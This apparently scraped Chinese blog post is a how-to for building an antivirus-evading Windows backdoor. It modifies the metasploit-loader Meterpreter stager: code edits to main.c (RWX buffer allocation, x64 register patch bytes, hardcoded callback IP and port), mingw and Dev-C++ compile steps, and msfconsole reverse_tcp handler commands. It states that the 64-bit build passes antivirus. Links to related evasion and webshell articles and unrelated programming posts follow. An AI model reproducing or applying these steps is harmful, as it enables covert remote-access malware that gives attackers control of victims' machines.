免杀之:MSF后门metasploit-loader免杀

1 metasploit-loader后门代码

  1. rsmudge/metasploit-loader: A client compatible with Metasploit's staging protocol (github.com)

2 在kali中编译metasploit-loader x32后门:已无法免杀

2.1 准备环境

  1. Kali安装编译器:apt-get update && apt install mingw-w64

2.2 编辑main.c脚本

  1. 进入/metasploit-loader/src/目录下:main.c脚本

    // 1. 将 include winsock2.h 放置于 windows.h 之前
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock2.h>
    #include <windows.h> // 2. 找到以下内容
    if (argc != 3) {
    printf(“%s [host] [port]\n”, argv[0]);
    exit(1);
    } /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], atoi(argv[2])); // 用下面的代码替换上面的代码
    /* connect to the handler */
    SOCKET my_socket = wsconnect(“yourip”, yourport);

2.3 编译软件

i686-w64-mingw32-gcc main.c -o loadmeta.exe -lws2_32

2.4 利用

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.2
run -j

2.5 参考

Bypassing AV through Metasploit Loader 32-Bit | by goswamiijaya | SecureBit | Medium

3 使用Dev C ++工具编译metasploit-loader x64后门:可免杀

3.1 准备环境

  1. Dev-C++ download | SourceForge.net

3.2 编辑main.c脚本

  1. 创建一个新的Project ,设置项目为:C Project --> application as a Console Application --> Loader64

  2. 确认GCC为:TDM-GCC 4.9.2 64-bit Release

  3. 使用main.c脚本替换默认的代码,并保存为Loader64.c

  4. 将 include winsock2.h 放置于 windows.h 之前

    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock2.h>
    #include <windows.h>
  5. 因为64-Bit需要增加处理字节,修改Loader64.c代码:106行至121行代码如下:

    	/* allocate a RWX buffer */
    buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
    punt(my_socket, "could not allocate buffer\n"); /* prepend a little assembly to move our SOCKET value to the EDI register
    thanks mihi for pointing this out
    BF 78 56 34 12 => mov edi, 0x12345678 */
    buffer[0] = 0x48;
    buffer[1] = 0xBF; /* copy the value of our socket to the buffer */
    memcpy(buffer + 2, &my_socket, 8); /* read bytes into the buffer */
    count = recv_all(my_socket, buffer + 10, size);
    • Line 107- 替换: size+ 5-> size+10
    • Line 114- 增加: buffer[0] = 0x48; # as mov in hex is 48
    • Line 115- 增加: buffer[1] = 0xBF; # as rdi in hex is BF
    • Line 118- 替换: 1->2 & 4->8
    • Line 121- 替换: 5->10

  6. 配置指定的远程反弹IP与端口

    // 找到以下内容
    if (argc != 3) {
    printf(“%s [host] [port]\n”, argv[0]);
    exit(1);
    } /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], atoi(argv[2])); // 用下面的代码替换上面的代码
    /* connect to the handler */
    SOCKET my_socket = wsconnect(“yourip”, yourport);

3.3 编译软件

  1. 添加编译选项:Tools --> Compiler Options --> -lws2_32

  2. 点击Compiler and Run编译

3.4 利用

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.50.2
run -j

3.5 可过杀软

3.5 参考

Bypassing AV through Metasploit Loader 64-Bit | by goswamiijaya | SecureBit | Medium

免杀之:MSF后门metasploit-loader免杀的更多相关文章

  1. 【黑客免杀攻防】读书笔记2 - 免杀与特征码、其他免杀技术、PE进阶介绍

    第3章 免杀与特征码 这一章主要讲了一些操作过程.介绍了MyCCL脚本木马免杀的操作,对于定位特征码在FreeBuf也曾发表过类似工具. VirTest5.0特征码定位器 http://www.fre ...

  2. [源码]Delphi源码免杀之函数动态调用 实现免杀的下载者

    [免杀]Delphi源码免杀之函数动态调用 实现免杀的下载者 2013-12-30 23:44:21         来源:K8拉登哥哥's Blog   自己编译这份代码看看 过N多杀软  没什么技 ...

  3. 开源网站云查杀方案,搭建自己的云杀毒-搭建ClamAV服务器

    开源网站云查杀方案,搭建自己的云杀毒 搭建ClamAV服务器 1        前言: 在上一篇我们已经演示了整个方案,传送门<开源网站云查杀方案,搭建自己的云杀毒>:https://ww ...

  4. msf后门之persistence

    在获取得了meterpreter shell后 使用Persistence建立持续性后门 run persistence -h meterpreter > run persistence -h ...

  5. php一句话后门过狗姿势万千之传输层加工(1)

    写在前面:过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面.但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会 ...

  6. PHP一句话后门过狗姿势万千之理论篇

    写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面. 但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人 ...

  7. Exp3 免杀原理与实践

    一.实验过程 1.编码器 (1)使用msf编码器,直接生成meterpreter可执行文件(跟Exp2中生成backdoor.exe的过程一样,生成后门文件),送到Virscan.VirusTotal ...

  8. Exp3 免杀原理与实践 20164314 郭浏聿

    一.实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀(0.5分) ...

  9. 2017-2018-2 20155314《网络对抗技术》Exp3 免杀原理与实践

    2017-2018-2 20155314<网络对抗技术>Exp3 免杀原理与实践 目录 实验要求 实验环境 预备知识 实验步骤 1 免杀效果实测 1.1 恶意代码生成工具 1.2 免杀效果 ...

  10. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

随机推荐

  1. ThinkPHP6.0在phpstorm添加查询构造器和模型的代码提示

    ThinkPHP6.0升级后 使用查询构造器和模型都没有了提示 原因是tp6源码中没有添加注释 找到Model.php * @method Query where(mixed $field, stri ...

  2. Django批量插入(自定义分页器)

    目录 一:批量插入 1.常规批量插入数据(时间长,效率低 不建议使用) 2.使用orm提供的bulk_create方法批量插入数据(效率高 减少操作时间) 3.总结 二:自定义分页器 1.自定义分页器 ...

  3. MySQL单表查询(分组-筛选-过滤-去重-排序-分页-判断-正则)

    目录 一:单表查询 1.单表查询(前期准备) 2.插入记录(写入数据) 3.查询关键字 二:查询关键字之where 1.查询id大于等于3小于等于6的数据 2.查询薪资是20000或者18000或者1 ...

  4. IdentityServer4的最佳使用

    简介   本人做微服务项目也有一段时间了,在微服务中让我感触颇深的就是这个IdentityServer4了,ID4(IdentityServer4的简称)中涉及的概念颇多,本文不谈概念(我怕读者没耐心 ...

  5. 命令指定IP端口号

    tcping命令是针对tcp监控的,也可以看到ping值,即使源地址禁ping也可以通过tcping来监控服务器网络状态,除了简单的ping之外,tcping最大的一个特点就是可以指定端口. 将下载好 ...

  6. 【JVM】根节点枚举与安全点

    本文已收录至Github,推荐阅读 Java随想录 微信公众号:Java随想录 CSDN: 码农BookSea 转载请在文首注明出处,如发现恶意抄袭/搬运,会动用法律武器维护自己的权益.让我们一起维护 ...

  7. selenium 输入文本时报InvalidElementStateException: Message: invalid element state

    问题: 当定位输入框时,定位到div标签,如:css->[class="delay el-input"],进行输入操作报invalid element state,显示元素状 ...

  8. 一文掌握MyBatis的动态SQL使用与原理

    摘要:使用动态 SQL 并非一件易事,但借助可用于任何 SQL 映射语句中的强大的动态 SQL 语言,MyBatis 显著地提升了这一特性的易用性. 本文分享自华为云社区<MyBatis详解 - ...

  9. [seaborn] seaborn学习笔记2-散点图Scatterplot

    2 散点图Scatterplot(代码下载) 散点图能够显示2个维度上2组数据的值.每个点代表一个观察点.X(水平)和Y(垂直)轴上的位置表示变量的值.研究这两个变量之间的关系是非常有用的.在seab ...

  10. K8s 为什么会抛弃 docker

    为什么 K8s 会抛弃 docker 前言 CRI containerd 参考 为什么 K8s 会抛弃 docker 前言 在这之前先来了解下,k8s 是如何和 docker 进行交互的. CRI k ...